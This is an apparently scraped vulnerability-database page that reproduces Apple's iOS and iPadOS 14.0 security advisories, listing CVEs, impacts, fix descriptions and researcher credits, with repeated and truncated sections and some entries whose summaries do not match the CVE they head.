80JpytEZrrVvscbth4bTeex52ibn1XFM9kqAX/Mfxaob2zBKt0fF6v3utFRKmx9g
fhqMR3CPf7QVG8mlYMQ57OT7iuQ4lYkFw9qGgPI4SGWiMWWVtUU=
=7kDq
-----END PGP SIGNATURE-----
| VAR-202010-1516 | CVE-2020-9964 | iOS and iPadOS Memory initialization vulnerability in |
CVSS V2: 4.9 CVSS V3: 5.5 Severity: MEDIUM |
A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 14.0 and iPadOS 14.0. A local user may be able to read kernel memory. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-11-13-3 Additional information for
APPLE-SA-2020-09-16-1 iOS 14.0 and iPadOS 14.0
iOS 14.0 and iPadOS 14.0 addresses the following issues. Information
about the security content is also available at
https://support.apple.com/HT211850.
AppleAVD
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9958: Mohamed Ghannam (@_simo36)
Assets
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker may be able to misuse a trust relationship to
download malicious content
Description: A trust issue was addressed by removing a legacy API.
CVE-2020-9979: CodeColorist of LightYear Security Lab of AntGroup
Entry updated November 12, 2020
Audio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
Audio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreAudio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Playing a malicious audio file may lead to arbitrary code
execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2020-9954: Francis working with Trend Micro Zero Day Initiative,
JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreCapture
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9949: Proteas
Entry added November 12, 2020
Disk Images
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9965: Proteas
CVE-2020-9966: Proteas
Entry added November 12, 2020
Icons
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to identify what other
applications a user has installed
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9773: Chilik Tamir of Zimperium zLabs
IDE Device Support
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
execute arbitrary code on a paired device during a debug session over
the network
Description: This issue was addressed by encrypting communications
over the network to devices running iOS 14, iPadOS 14, tvOS 14, and
watchOS 7.
CVE-2020-9992: Dany Lisiansky (@DanyL931), Nikias Bassen of Zimperium
zLabs
Entry updated September 17, 2020
ImageIO
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9961: Xingwei Lin of Ant Security Light-Year Lab
Entry added November 12, 2020
ImageIO
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9876: Mickey Jin of Trend Micro
Entry added November 12, 2020
IOSurfaceAccelerator
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2020-9964: Mohamed Ghannam (@_simo36), Tommy Muir (@Muirey03)
Kernel
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
inject into active connections within a VPN tunnel
Description: A routing issue was addressed with improved
restrictions.
CVE-2019-14899: William J. Tolley, Beau Kujath, and Jedidiah R.
Crandall
Entry added November 12, 2020
Keyboard
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: A logic issue was addressed with improved state
management.
CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany
libxml2
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted file may lead to arbitrary
code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9981: found by OSS-Fuzz
Entry added November 12, 2020
Mail
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to unexpectedly alter
application state
Description: This issue was addressed with improved checks.
CVE-2020-9941: Fabian Ising of FH Münster University of Applied
Sciences and Damian Poddebniak of FH Münster University of Applied
Sciences
Entry added November 12, 2020
Messages
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to discover a user’s deleted
messages
Description: The issue was addressed with improved deletion.
CVE-2020-9988: William Breuer of the Netherlands
CVE-2020-9989: von Brunn Media
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-13520: Aleksandar Nikolic of Cisco Talos
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2020-6147: Aleksandar Nikolic of Cisco Talos
CVE-2020-9972: Aleksandar Nikolic of Cisco Talos
Entry added November 12, 2020
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9973: Aleksandar Nikolic of Cisco Talos
NetworkExtension
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to elevate privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9996: Zhiwei Yuan of Trend Micro iCore Team, Junzhi Lu and
Mickey Jin of Trend Micro
Entry added November 12, 2020
Phone
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: The screen lock may not engage after the specified time
period
Description: This issue was addressed with improved checks.
CVE-2020-9946: Daniel Larsson of iolight AB
Quick Look
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious app may be able to determine the existence of
files on the computer
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9963: Csaba Fitzl (@theevilbit) of Offensive Security
Entry added November 12, 2020
Safari
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to determine a user's
open tabs in Safari
Description: A validation issue existed in the entitlement
verification.
CVE-2020-9977: Josh Parnham (@joshparnham)
Entry added November 12, 2020
Safari
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Visiting a malicious website may lead to address bar spoofing
Description: The issue was addressed with improved UI handling.
CVE-2020-9993: Masato Sugiyama (@smasato) of University of Tsukuba,
Piotr Duszynski
Entry added November 12, 2020
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to view senstive user information
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2020-9969: Wojciech Reguła of SecuRing (wojciechregula.blog)
Entry added November 12, 2020
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to access restricted
files
Description: A logic issue was addressed with improved restrictions.
CVE-2020-9968: Adam Chester (@_xpn_) of TrustedSec
Entry updated September 17, 2020
Siri
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A person with physical access to an iOS device may be able to
view notification contents from the lockscreen
Description: A lock screen issue allowed access to messages on a
locked device.
CVE-2020-9959: an anonymous researcher, an anonymous researcher, an
anonymous researcher, an anonymous researcher, an anonymous
researcher, Andrew Goldberg The University of Texas at Austin,
McCombs School of Business, Meli̇h Kerem Güneş of Li̇v College, Sinan
Gulguler
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2020-13434
CVE-2020-13435
CVE-2020-9991
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to leak memory
Description: An information disclosure issue was addressed with
improved state management.
CVE-2020-9849
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Multiple issues in SQLite
Description: Multiple issues were addressed by updating SQLite to
version 3.32.3.
CVE-2020-15358
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A maliciously crafted SQL query may lead to data corruption
Description: This issue was addressed with improved checks.
CVE-2020-13631
Entry added November 12, 2020
SQLite
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2020-13630
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9947: cc working with Trend Micro Zero Day Initiative
CVE-2020-9950: cc working with Trend Micro Zero Day Initiative
CVE-2020-9951: Marcin 'Icewall' Noga of Cisco Talos
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to code
execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9983: zhunki
Entry added November 12, 2020
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
Wi-Fi
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A logic issue was addressed with improved state
management.
CVE-2020-10013: Yu Wang of Didi Research America
Entry added November 12, 2020
Additional recognition
App Store
We would like to acknowledge Giyas Umarov of Holmdel High School for
their assistance.
Audio
We would like to acknowledge JunDong Xie and XingWei Lin of Ant-
financial Light-Year Security Lab for their assistance.
Entry added November 12, 2020
Bluetooth
We would like to acknowledge Andy Davis of NCC Group and Dennis
Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for
their assistance.
CallKit
We would like to acknowledge Federico Zanetello for their assistance.
CarPlay
We would like to acknowledge an anonymous researcher for their
assistance.
Clang
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Entry added November 12, 2020
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
debugserver
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
iAP
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
iBoot
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero,
Stephen Röttger of Google for their assistance.
Entry updated November 12, 2020
libarchive
We would like to acknowledge Dzmitry Plotnikau and an anonymous
researcher for their assistance.
lldb
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
Entry added November 12, 2020
Location Framework
We would like to acknowledge Nicolas Brunner
(linkedin.com/in/nicolas-brunner-651bb4128) for their assistance.
Entry updated October 19, 2020
Mail
We would like to acknowledge an anonymous researcher for their
assistance.
Entry added November 12, 2020
Mail Drafts
We would like to acknowledge Jon Bottarini of HackerOne for their
assistance.
Entry added November 12, 2020
Maps
We would like to acknowledge Matthew Dolan of Amazon Alexa for their
assistance.
NetworkExtension
We would like to acknowledge Thijs Alkemade of Computest and ‘Qubo
Song’ of ‘Symantec, a division of Broadcom’ for their assistance.
Phone Keypad
We would like to acknowledge Hasan Fahrettin Kaya of Akdeniz
University, an anonymous researcher for their assistance.
Entry updated November 12, 2020
Safari
We would like to acknowledge Andreas Gutmann (@KryptoAndI) of
OneSpan's Innovation Centre (onespan.com) and University College
London, Steven J. Murdoch (@SJMurdoch) of OneSpan's Innovation Centre
(onespan.com) and University College London, Jack Cable of Lightning
Security, Ryan Pickren (ryanpickren.com), Yair Amit for their
assistance.
Entry added November 12, 2020
Safari Reader
We would like to acknowledge Zhiyang Zeng(@Wester) of OPPO ZIWU
Security Lab for their assistance.
Entry added November 12, 2020
Security
We would like to acknowledge Christian Starkjohann of Objective
Development Software GmbH for their assistance.
Entry added November 12, 2020
Status Bar
We would like to acknowledge Abdul M. Majumder, Abdullah Fasihallah
of Taif university, Adwait Vikas Bhide, Frederik Schmid, Nikita, and
an anonymous researcher for their assistance.
Telephony
We would like to acknowledge Onur Can Bıkmaz, Vodafone Turkey
@canbkmaz, Yiğit Can YILMAZ (@yilmazcanyigit), an anonymous
researcher for their assistance.
Entry updated November 12, 2020
UIKit
We would like to acknowledge Borja Marcos of Sarenet, Simon de Vegt,
and Talal Haj Bakry (@hajbakri) and Tommy Mysk (@tommymysk) of Mysk
Inc for their assistance.
Web App
We would like to acknowledge Augusto Alvarez of Outcourse Limited for
their assistance.
WebKit
We would like to acknowledge Pawel Wylecial of REDTEAM.PL, Ryan
Pickren (ryanpickren.com), Tsubasa FUJII (@reinforchu), Zhiyang
Zeng(@Wester) of OPPO ZIWU Security Lab for their assistance.
Entry added November 12, 2020
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 14.0 and iPadOS 14.0".
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl+uxqgACgkQZcsbuWJ6
jjBhIhAAhLzDSjgjVzG0JLzEerhFBcAWQ1G8ogmIdxuC0aQfvxO4V1NriKzUcmsZ
UgQCEdN4kzfLsj3KeuwSeq0pg2CX1eZdgY/FyuOBRzljsmGPXJgkyYapJww6mC8n
7jeJazKusiyaRmScLYDwvbOQGlaqCfu6HrM9umMpLfwPGjFqe/gz8jyxohdVZx9t
pNC0g9l37dVJIvFRc1mAm9HAnIQoL8CDOEd96jVYiecB8xk0X6CwjZ7nGzYJc5LZ
A54EaN0dDz+8q8jgylmAd8xkA8Pgdsxw+LWDr1TxPuu3XIzYa98S1AsItK2eiWx8
pIhrzVZ3fk1w3+W/cSWrgzUq4ouijWcWw9dmVgxmzv9ldL/pS+wIgFsYLJm4xHAp
PH+9p3JmMQks9BWgr3h+NEcJwCUm5J7y0PNuCnQL2iKzn4jikqgfCXHZOidkPV3t
KjeeIFX30AGI7cUqhRl9GbRn8l5SA4pbd4a0Y5df1PgkDjSXxw91Z1+5S15Qfrzs
K8pBlPH37yU3aqMEvxBsN5Fd7vdFdA+pV/aWG5tw4pUlZJC25c50w1ZW0vrnsisg
/isPJqXhUWiGAfQ7s5W6W3AMs4PyvRjY+7zzGiHAd+wNkUNwVTbXvKP4W4n/vGH8
uARpQRQsureymLerXpVTwH8ZoeDEeZZwaqNHTQKg/M9ifAZPZUA=
=WdqR
-----END PGP SIGNATURE-----
| VAR-202010-1499 | CVE-2020-9992 | plural Apple Product vulnerabilities |
CVSS V2: 9.3 CVSS V3: 7.8 Severity: HIGH |
This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. There are security holes in Apple iOS.
Installation note:
Xcode 12.0 may be obtained from:
https://developer.apple.com/xcode/downloads/
To check that the Xcode has been updated:
* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "Xcode 12.0". -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-09-16-1 iOS 14.0 and iPadOS 14.0
iOS 14.0 and iPadOS 14.0 are now available and address the following:
AppleAVD
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9958: Mohamed Ghannam (@_simo36)
Assets
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker may be able to misuse a trust relationship to
download malicious content
Description: A trust issue was addressed by removing a legacy API.
CVE-2020-9979: CodeColorist of Ant-Financial LightYear Labs
Icons
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to identify what other
applications a user has installed
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9992: Dany Lisiansky (@DanyL931), Nikias Bassen
IOSurfaceAccelerator
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2020-9964: Mohamed Ghannam (@_simo36), Tommy Muir (@Muirey03)
Keyboard
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: A logic issue was addressed with improved state
management.
CVE-2020-9976: Rias A. Sherzad of JAIDE GmbH in Hamburg, Germany
Model I/O
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted USD file may lead to
unexpected application termination or arbitrary code execution
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9973: Aleksandar Nikolic of Cisco Talos
Phone
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: The screen lock may not engage after the specified time
period
Description: This issue was addressed with improved checks.
CVE-2020-9946: Daniel Larsson of iolight AB
Sandbox
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to access restricted
files
Description: A logic issue was addressed with improved restrictions.
CVE-2020-9968: Adam Chester(@xpn) of TrustedSec
Siri
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A person with physical access to an iOS device may be able to
view notification contents from the lockscreen
Description: A lock screen issue allowed access to messages on a
locked device. This issue was addressed with improved state
management.
CVE-2020-9959: an anonymous researcher, an anonymous researcher, an
anonymous researcher, an anonymous researcher, an anonymous
researcher, Andrew Goldberg The University of Texas at Austin,
McCombs School of Business, Meli̇h Kerem Güneş of Li̇v College, Sinan
Gulguler
WebKit
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing maliciously crafted web content may lead to a
cross site scripting attack
Description: An input validation issue was addressed with improved
input validation.
CVE-2020-9952: Ryan Pickren (ryanpickren.com)
Additional recognition
App Store
We would like to acknowledge Giyas Umarov of Holmdel High School for
their assistance.
Bluetooth
We would like to acknowledge Andy Davis of NCC Group and Dennis
Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for
their assistance.
CallKit
We would like to acknowledge Federico Zanetello for their assistance.
CarPlay
We would like to acknowledge an anonymous researcher for their
assistance.
Core Location
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
debugserver
We would like to acknowledge Linus Henze (pinauten.de) for their
assistance.
iAP
We would like to acknowledge Andy Davis of NCC Group for their
assistance.
iBoot
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
libarchive
We would like to acknowledge Dzmitry Plotnikau and an anonymous
researcher for their assistance.
Location Framework
We would like to acknowledge an anonymous researcher for their
assistance.
Maps
We would like to acknowledge Matthew Dolan of Amazon Alexa for their
assistance.
NetworkExtension
We would like to acknowledge Thijs Alkemade of Computest and ‘Qubo
Song’ of ‘Symantec, a division of Broadcom’ for their assistance.
Phone Keypad
We would like to acknowledge an anonymous researcher for their
assistance.
Status Bar
We would like to acknowledge Abdul M. Majumder, Abdullah Fasihallah
of Taif university, Adwait Vikas Bhide, Frederik Schmid, Nikita, and
an anonymous researcher for their assistance.
Telephony
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
UIKit
We would like to acknowledge Borja Marcos of Sarenet, Simon de Vegt,
and Talal Haj Bakry (@hajbakri) and Tommy Mysk (@tommymysk) of Mysk
Inc for their assistance.
Web App
We would like to acknowledge Augusto Alvarez of Outcourse Limited for
their assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 14.0 and iPadOS 14.0".
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl9igm4ACgkQZcsbuWJ6
jjDK/hAAndL9caBfy/uHMnz9jhpDNrJuDai5gTZeAhUSwRalVppYwTEMpcSrx7u6
O7R0uLcvd1v9AiTGpF2zcERNlQbd7L1GaErPBaWnPbXSzLoUDkCNxuw5S+EEGuF5
nOxvh+qaS1ISny6teXpW6VLvLqV6n3BuNHUAbyP1JuF/EB7V9R1MD8zOUM7jsn6t
Lwyz++s1nQbwt2jH1OKZa0pP2cSjVJjlKi8iDnFnMUjaSn8LCsgNXTsvipX8rA7r
aeUxlPkIA2bwM5/0CFoPWpoPjNKXxoADjryJOat0GjPp/dSewrXncE/aKvrJGcJ7
Hwg4Q2Ep8a6NKL1QZ3ST64kf28UTA06xcypzinIpJVqtLj8LOvRDUGak3h+xETHB
E4evSHlNfDzKrzu7kArguneeh4IwSpN1kSc4kt2rGpAQ0ch0bT34AzbNDpoUidm1
oPU3WVcEeBD9PYKGAWMiBcm3X6B0wHsAYDLCgkqnxrbDgz7NlsmVIl3dvrVbLrl1
jxaVaofaqANk+uTzoB1QArZRowf5GzW17htRijPazna1qYHo6jp/fzrGbdoMDuhb
80JpytEZrrVvscbth4bTeex52ibn1XFM9kqAX/Mfxaob2zBKt0fF6v3utFRKmx9g
fhqMR3CPf7QVG8mlYMQ57OT7iuQ4lYkFw9qGgPI4SGWiMWWVtUU=
=7kDq
-----END PGP SIGNATURE-----
| VAR-202010-1514 | CVE-2020-9959 | iOS and iPadOS Access vulnerabilities in |
CVSS V2: 2.1 CVSS V3: 2.4 Severity: LOW |
A lock screen issue allowed access to messages on a locked device. This issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0. A person with physical access to an iOS device may be able to view notification contents from the lockscreen. Apple iOS is an operating system developed by Apple (Apple) for mobile devices. A security vulnerability exists in Apple iOS due to an out-of-bounds write issue addressed through improved bounds checking. An attacker could exploit this vulnerability to cause an unexpected system termination or write to kernel memory. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-11-13-3 Additional information for
APPLE-SA-2020-09-16-1 iOS 14.0 and iPadOS 14.0
iOS 14.0 and iPadOS 14.0 addresses the following issues. Information
about the security content is also available at
https://support.apple.com/HT211850.
AppleAVD
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9958: Mohamed Ghannam (@_simo36)
Assets
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker may be able to misuse a trust relationship to
download malicious content
Description: A trust issue was addressed by removing a legacy API.
CVE-2020-9979: CodeColorist of LightYear Security Lab of AntGroup
Entry updated November 12, 2020
Audio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9943: JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
Audio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2020-9944: JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreAudio
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Playing a malicious audio file may lead to arbitrary code
execution
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2020-9954: Francis working with Trend Micro Zero Day Initiative,
JunDong Xie of Ant Group Light-Year Security Lab
Entry added November 12, 2020
CoreCapture
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2020-9949: Proteas
Entry added November 12, 2020
Disk Images
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9965: Proteas
CVE-2020-9966: Proteas
Entry added November 12, 2020
Icons
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A malicious application may be able to identify what other
applications a user has installed
Description: The issue was addressed with improved handling of icon
caches.
CVE-2020-9773: Chilik Tamir of Zimperium zLabs
IDE Device Support
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: An attacker in a privileged network position may be able to
execute arbitrary code on a paired device during a debug session over
the network
Description: This issue was addressed by encrypting communications
over the network to devices running iOS 14, iPadOS 14, tvOS 14, and
watchOS 7.
CVE-2020-9992: Dany Lisiansky (@DanyL931), Nikias Bassen of Zimperium
zLabs
Entry updated September 17, 2020
ImageIO
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Processing a maliciously crafted image may lead to arbitrary
code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2020-9961: Xingwei Lin of Ant Security Light-Year Lab
Entry added November 12, 2020
ImageIO
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: Opening a maliciously crafted PDF file may lead to an
unexpected application termination or arbitrary code execution
Description: An out-of-bounds write issue was addressed with improved
bounds checking.
CVE-2020-9876: Mickey Jin of Trend Micro
Entry added November 12, 2020
IOSurfaceAccelerator
Available for: iPhone 6s and later, iPod touch 7th generation, iPad
Air 2 and later, and iPad mini 4 and later
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
